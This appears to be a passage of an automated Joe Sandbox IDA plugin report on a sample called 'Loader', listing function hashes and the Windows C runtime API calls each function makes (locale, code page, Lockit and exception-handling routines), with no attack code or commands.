                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLocale
                                                                                                                      • String ID: ACP$OCP
                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                      • Opcode ID: 50fc947b0682e007ee568eddd24dfc9ed0bf82ef3d5b0da16e4fae2313d2360f
                                                                                                                      • Instruction ID: ce9f0c1a18ffe047ce796ddd8f919acc9faff751f420c6b07d3a132a0cab4665
                                                                                                                      • Opcode Fuzzy Hash: 50fc947b0682e007ee568eddd24dfc9ed0bf82ef3d5b0da16e4fae2313d2360f
                                                                                                                      • Instruction Fuzzy Hash: 1321867A644104AADB359F58C903AA7B3A6AF56BA0B568464E90AE7101F733DE40C3F0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
                                                                                                                        • Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB
                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001ACDE0
                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 001ACE29
                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 001ACE38
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001ACE80
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001ACE9F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 415426439-0
                                                                                                                      • Opcode ID: 1f7703440d2d8baf435880d1b64074628792ab3a812af521f704b6dbc332a125
                                                                                                                      • Instruction ID: 0035f00e3f13ea71b8f36073e71c013a83a0d137d69a834530de8848d3e61d73
                                                                                                                      • Opcode Fuzzy Hash: 1f7703440d2d8baf435880d1b64074628792ab3a812af521f704b6dbc332a125
                                                                                                                      • Instruction Fuzzy Hash: 4251A179A0060AABDB10EFA4CC41ABE7BB8BF56700F144439F514E7190EB709A44CBE1
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
                                                                                                                        • Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB
                                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,001A16A3,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001AC431
                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001A16A3,?,?,?,00000055,?,-00000050,?,?), ref: 001AC45C
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001AC5BF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                      • String ID: utf8
                                                                                                                      • API String ID: 607553120-905460609
                                                                                                                      • Opcode ID: bbebe72fbfb04b07f0333ab3ba8041359e1a77d8098785c2896eea13290b1dd9
                                                                                                                      • Instruction ID: 774c7b534eff5476c6dd441eed0c661d88ad61613c4e8fd60923798f9d578477
                                                                                                                      • Opcode Fuzzy Hash: bbebe72fbfb04b07f0333ab3ba8041359e1a77d8098785c2896eea13290b1dd9
                                                                                                                      • Instruction Fuzzy Hash: 2B712779B00306AADB28AB39CC46FBA73A8EF6A750F144429F515D7181FB74ED4087E4
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3213747228-0
                                                                                                                      • Opcode ID: 17a8af3533a897e6e906cec53c923a3a22616cf0740b16545c45100316cc9468
                                                                                                                      • Instruction ID: fc989dbeaa2db11030625bcaae41e600c31fac45933931283d4d715c98ff70b9
                                                                                                                      • Opcode Fuzzy Hash: 17a8af3533a897e6e906cec53c923a3a22616cf0740b16545c45100316cc9468
                                                                                                                      • Instruction Fuzzy Hash: 58B17A3AD002459FDF15CF68C8917FEBBA5EFA6340F15816AF904AB241D3B49D41CBA0
                                                                                                                      APIs
                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00197514
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 001975E0
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001975F9
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00197603
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 254469556-0
                                                                                                                      • Opcode ID: b39f09892c5069a8793f1adb4f26c6018a0cec7686a14d937c508cabda776516
                                                                                                                      • Instruction ID: 4001f41ba79e16392188d69e1115cfaa8756efc0bcb31323cfa97f730da242d5
                                                                                                                      • Opcode Fuzzy Hash: b39f09892c5069a8793f1adb4f26c6018a0cec7686a14d937c508cabda776516
                                                                                                                      • Instruction Fuzzy Hash: FF31F775D152199BDF20EFA4D9897CDBBB8BF18300F1041AAE40DAB290EB719B848F45
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00193272: __EH_prolog3_catch.LIBCMT ref: 00193279
                                                                                                                      • _Deallocate.LIBCONCRT ref: 00191EAD
                                                                                                                      • _Deallocate.LIBCONCRT ref: 00191EFA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Deallocate$H_prolog3_catch
                                                                                                                      • String ID: Current val: %d
                                                                                                                      • API String ID: 1212816977-1825967858
                                                                                                                      • Opcode ID: a424b2a6da356b597d4bd61dfcba192187442aaaec6ea158ec1f9ce625af762b
                                                                                                                      • Instruction ID: 3b5c54654b036e63f4fcd303ac846253f5ecae6d34260f7ff8eb6a838d6f613a
                                                                                                                      • Opcode Fuzzy Hash: a424b2a6da356b597d4bd61dfcba192187442aaaec6ea158ec1f9ce625af762b
                                                                                                                      • Instruction Fuzzy Hash: 4A61CC7251C3429FC721DF69D48026BFBE0AFD9724F140A2DF9D493242D735E9448B92
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 00193820
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0019382A
                                                                                                                      • int.LIBCPMT ref: 00193841
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705
                                                                                                                      • codecvt.LIBCPMT ref: 00193864
                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0019387B
                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0019389B
                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 001938A8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                      • String ID: 8K!
                                                                                                                      • API String ID: 2133458128-2329799594
                                                                                                                      • Opcode ID: d596c8b56cc9fd85446bb08de09315fb678e42f0a98c2bfe023bc6972e4a3e0f
                                                                                                                      • Instruction ID: 1b182c57e126e512141ae7982472b96ecc5f41ef07da2caf866498b1f348f4cb
                                                                                                                      • Opcode Fuzzy Hash: d596c8b56cc9fd85446bb08de09315fb678e42f0a98c2bfe023bc6972e4a3e0f
                                                                                                                      • Instruction Fuzzy Hash: 5501D235D04116ABCF05EBA4C8456ADB7B1AFA4320F550508F825AB381DF74DF458B91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3907804496
                                                                                                                      • Opcode ID: 30ae17a9c98b78930a4103a37ba2af49b74f639fa865806eaeb75c96fe9991ed
                                                                                                                      • Instruction ID: 60ec781d8513a021da3ce0247946aa7e5f4607e2bd4e71473f1a1595e10b6006
                                                                                                                      • Opcode Fuzzy Hash: 30ae17a9c98b78930a4103a37ba2af49b74f639fa865806eaeb75c96fe9991ed
                                                                                                                      • Instruction Fuzzy Hash: F0B12578A08245DFDF05DFA9DC84BAEBBB5AF96310F148159E404AB2D2CB349F41CB61
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 00194F4A
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00194F54
                                                                                                                      • int.LIBCPMT ref: 00194F6B
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705
                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00194FA5
                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00194FC5
                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00194FD2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                      • String ID: TK!
                                                                                                                      • API String ID: 55977855-3406879214
                                                                                                                      • Opcode ID: b1bc25d12063d9bb8556d879209d8f1f5e00d0e0c9235c758c8e41be24456ea2
                                                                                                                      • Instruction ID: 071e3ce6b808f8853311382808dd58a7975ea228392fddc9d96cc7b245dd6070
                                                                                                                      • Opcode Fuzzy Hash: b1bc25d12063d9bb8556d879209d8f1f5e00d0e0c9235c758c8e41be24456ea2
                                                                                                                      • Instruction Fuzzy Hash: 19110371900219ABCF05EB68C846BAEB7F9AF64320F120509F425A7381DFB4EE418B91
                                                                                                                      APIs
                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0019A2C7
                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 0019A3D5
                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0019A542
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                      • String ID: csm$csm$csm
                                                                                                                      • API String ID: 1206542248-393685449
                                                                                                                      • Opcode ID: 431a1a89ae57b6e7917a7b4f78c6a113fcb8d02859028e1342aa7ffe107b6cb6
                                                                                                                      • Instruction ID: 975ac11d143191924c6a25af9dc02371b117e8a37d8a22cb8c6deb27397bd708
                                                                                                                      • Opcode Fuzzy Hash: 431a1a89ae57b6e7917a7b4f78c6a113fcb8d02859028e1342aa7ffe107b6cb6
                                                                                                                      • Instruction Fuzzy Hash: 1CB1AD71800209EFCF25DFA8C8859AEBBB5FF24310F95419AE8006B212D771EE55CBD2
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,001A363C,?,?,00000000,00000000,?,?,001A37EA,00000021,FlsSetValue,001B69C8,001B69D0,00000000), ref: 001A35F0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                      • Opcode ID: 954e9b5ebd0d443c6bfc165a5448fc314c5ae990cd43338a8f01d82632c60967
                                                                                                                      • Instruction ID: b17c03ff05ad46bd6f06b01abe7b54ad611bf4e1da037ff65d3798138731556d
                                                                                                                      • Opcode Fuzzy Hash: 954e9b5ebd0d443c6bfc165a5448fc314c5ae990cd43338a8f01d82632c60967
                                                                                                                      • Instruction Fuzzy Hash: 7A210A39E01210FBCB219B29EC49B9A7759AF53774F250215F935A7291EB30EF05CAD0
                                                                                                                      APIs
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0019308B
                                                                                                                      • int.LIBCPMT ref: 0019309E
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705
                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 001930D1
                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 001930E7
                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 001930F2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                      • String ID: \K!
                                                                                                                      • API String ID: 2081738530-3305343062
                                                                                                                      • Opcode ID: e454139d7e4a0e22431b12f76975df1ee3b082ef04f9dc2d1eced559fe0c4338
                                                                                                                      • Instruction ID: a79c4938e1036861c70cb90700e6d611ca33d9745e3e702e6485fd15535a10b3
                                                                                                                      • Opcode Fuzzy Hash: e454139d7e4a0e22431b12f76975df1ee3b082ef04f9dc2d1eced559fe0c4338
                                                                                                                      • Instruction Fuzzy Hash: C301A736904115BBCF19AB54D8058DDB778DF90360B154145F5255B291EF30EF81C7D0
                                                                                                                      APIs
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 001924FB
                                                                                                                      • int.LIBCPMT ref: 0019250E
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705
                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00192541
                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00192557
                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00192562
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                      • String ID: `K!
                                                                                                                      • API String ID: 2081738530-3899823266
                                                                                                                      • Opcode ID: 90a050b76b162d965ea760257da1ec0ec0487566133ab35f9e748f927da8e352
                                                                                                                      • Instruction ID: 6f021000145e2226cd7a13c92aeaf2d8bfef575c5161f193c7032ba4f3f38da2
                                                                                                                      • Opcode Fuzzy Hash: 90a050b76b162d965ea760257da1ec0ec0487566133ab35f9e748f927da8e352
                                                                                                                      • Instruction Fuzzy Hash: CF01DF32904115FBDF19AB54E8158ED7768DFA0720B120148F4159B281EF30EE46CBC0
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 001966C4
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0019672F
                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019674C
                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0019678B
                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001967EA
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0019680D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2829165498-0
                                                                                                                      • Opcode ID: 3c42810f0402d8cdfbfa6612ac12c8da37f89ab8d3bdaabd14faf034bfb2b275
                                                                                                                      • Instruction ID: fd4b63b902547f498e14e84cbed655e9666f95d68cb95f89ca96952b8a40a8a6
                                                                                                                      • Opcode Fuzzy Hash: 3c42810f0402d8cdfbfa6612ac12c8da37f89ab8d3bdaabd14faf034bfb2b275
                                                                                                                      • Instruction Fuzzy Hash: 6951AE72A0021AEFEF249FA1CC45FAB7BA9EF44794F254529F914A6150DB30DD50CBB0
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,00199E31,0019802B,001976E5), ref: 00199E48
                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00199E56
                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00199E6F
                                                                                                                      • SetLastError.KERNEL32(00000000,00199E31,0019802B,001976E5), ref: 00199EC1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3852720340-0
                                                                                                                      • Opcode ID: 35717d709cf17fc26ad939ebd297f6fe03aed37d9f9f23a27a922b4b02a763e6
                                                                                                                      • Instruction ID: 2193068ae8c52f756d8395eed581381516a460575a4c5f5a83a64c50def2988e
                                                                                                                      • Opcode Fuzzy Hash: 35717d709cf17fc26ad939ebd297f6fe03aed37d9f9f23a27a922b4b02a763e6
                                                                                                                      • Instruction Fuzzy Hash: 9C01F73260D611EEAF257BB9BDC676B3A99FB11775720033DF121811F0EFA24C419141
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,001B1F55,000000FF,?,001A0D3B,001A0E6B,?,001A0D0F,00000000), ref: 001A0DE0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,001B1F55,000000FF,?,001A0D3B,001A0E6B,?,001A0D0F,00000000), ref: 001A0DF2
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,001B1F55,000000FF,?,001A0D3B,001A0E6B,?,001A0D0F,00000000), ref: 001A0E14
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                      • Opcode ID: e89c1bdbeb840ffa8339428395cfdedb46b2bd143029c754627bef18ddbcca0e
                                                                                                                      • Instruction ID: cee186e811f4aa49f3f914f4c84c7db2db0b1aa9b47607f9b2efcedff820af2a
